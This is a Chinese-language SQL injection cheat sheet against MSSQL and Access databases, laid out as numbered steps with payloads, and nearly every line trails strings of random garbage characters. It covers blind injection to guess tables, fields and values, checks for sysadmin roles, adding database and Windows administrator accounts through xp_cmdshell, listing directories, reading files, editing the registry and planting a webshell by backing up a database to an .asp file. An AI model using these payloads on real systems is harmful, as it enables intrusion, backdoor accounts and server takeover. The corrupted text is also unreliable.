1.判断是否有注入;and 1=1 ;and 1=2 .G�vk�5Wn
2.初步判断是否是mssql ;and user>0 Hb::;[bm:
L�k�P
:l�
3.注入参数是字符'and [查询条件] and ''=' Xx%<rsA�>F
)J�0h\k�y
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Cl!(F�6K�*
�%?aq1 =�B
5.判断数据库系统 2H�0BNr�YM
`�'sD��(�e
;and (select count(*) from sysobjects)>0 mssql ��+�4��Pes
R d�wt4�A+
;and (select count(*) from msysobjects)>0 access ^jUw4Dj~-q
PgGU��s4[�
�-�zn_d]NV
5V\",PA�W�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J�AP(�J�~
B2�P�@9u|9
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �C�a�O-�aL
���P�9f`<o
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2�<y9x�vp�
|#M|"7;2z
9.(1)猜字段的ascii值(access) *8m['�$oyV
qk3|f�W/-�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Dcd�Et=\)h
Hh*?�[-&r~
(2)猜字段的ascii值(mssql) �x�E]�y*�\
�yz�=X{p1�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 \q4r/SbgW�
=-X-�${/��
10.测试权限结构(mssql) �� 7gZ�}Qy
Mq�v�o
�j7
f�7]�[#�EL
R�LMn&j|?e
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ;RX u}��pd
v=0G&�x=�/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 3Jlap=]68S
�4oueLT(zc
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- O�!{YwE8x9
V+y�"L>�K�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Up'#�O�kTx
^V#�,iO9.-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- u�C#@qpzy�
/]5�*�;kO`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- M<n'ZDK�`W
{�sr�xc4R`
;and 1=(select IS_MEMBER('db_owner'));-- `�&7tA�DFB
-f���mJ�kI
7>�BfH��b�
w4�Df?�)�Z
11.添加mssql和系统的帐户 DyiJ4m}�kh
`o295eiY(b
;exec master.dbo.sp_addlogin username;-- la_c:��#ho
;exec master.dbo.sp_password null,username,password;-- C��!Sr�v�7
��\�3^ue0�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 1O��NkmVtL
gC��C7L(�1
;exec master.dbo.xp_cmdshell 'net user username password ��t��(-,mw
zU+q03l8Ur
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- p�/V��Vb%�
u;-fG9x�s�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �x�l�u��4�
�n�+hL/aQ+
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- \|HNFx��T`
.�6a�zUD4
<?5|(�Q"@:
�C�-;w�}
12.(1)遍历目录 u�W[[�8+t|
Cp"7�R&s
;create table dirs(paths varchar(100), id int) z|D*ymz*EY
OM&GypP6�&
;insert dirs exec master.dbo.xp_dirtree 'c:\' 4�d4+%5G�E
��]���2qKc
;and (select top 1 paths from dirs)>0 M?%x=��q\<
�9g�5h~�Ma
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��=
a60X�v
-�[
gT}{k!
BDWbWA�
�6
�'u�;�O2�$
(2)遍历目录 =�!^
gQ0~4
QO(F%�&v++
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��!p/?IW+
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ?`r�A�O#1
V�D�bbA\�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 v#/Gxk9�eX
@|c���])�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 QR'#�]k;>%
w"s@q$}]8M
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 F�Zj>��N(
� k�-�=�LD
aW�&)3C2-x
II�}M|qHaK
13.mssql中的存储过程 iP"sw0V��8
+�|,4g_(�j
xp_regenumvalues 注册表根键, 子键 XgHJ O��qt
-"�d�t3$ju
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �e@ZM�&i�R
m\0��_1 #(
xp_regread 根键,子键,键值名 �/~�{`!30
@|vH�5�Pi
;exec xp_regread �zZ8��*a\�
{��XmCG%%L
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �4F�6aPo2�
t��j[E��!
xp_regwrite 根键,子键, 值名, 值类型, 值 &~�H��e�d_
�znw�Kwc8,
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Nb`qM]���&
(;},~�( 2B
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 IUFc_u�L@\
@nY]�S\i�f
xp_regdeletevalue 根键,子键,值名 sr��c+�z�#
`{�G&i\�"n
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >9���dD7FH
�yQ�N{)r�v
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ^D$|$=�|DH
\xCC�JWek�
h&��$h<zL[
yEI�@^8]�s
14.mssql的backup创建webshell ezp%8�I�Z;
^0OP�&�s;"
use model b��TaKB-�
i9DD)��Y<
create table cmd(str image); M��>]A!�W=
\M�Owp@|�y
insert into cmd(str) values (''); j,�+]tH�C-
]$[sfPKA��
backup database model to disk='c:\l.asp'; u�jX;�wGje
V�^�5d5�Ao
Km8aH�c]O~
D!�[v{0�er
15.mssql内置函数 :]m.�&r S,
+ '�_t)�k^
;and (select @@version)>0 获得Windows的版本号 L��n�I���
rQ���VX��^
;and user_name()='dbo' 判断当前系统的连接用户是不是sa {}$7�B���p
d�}h{#�va*
;and (select user_name())>0 爆当前系统的连接用户 w�>&*-}XX�
w31�Ox1>s
;and (select db_name())>0 得到当前连接的数据库 Q�kdcW>:a7
�y(p_Un�m
�r[��a7">n
"^n�,(l*4x
16.简洁的webshell J{�1H$[W~}
7~mhWPzMwB
use model 7#0b��uXBg
sI�!H=bp-8
create table cmd(str image); &x���QM�!f
tbd=�A�]B-
insert into cmd(str) values (''); 0�0Q�J596�
0��5`"U#`:
backup database model to disk='g:\wwwtest\l.asp';
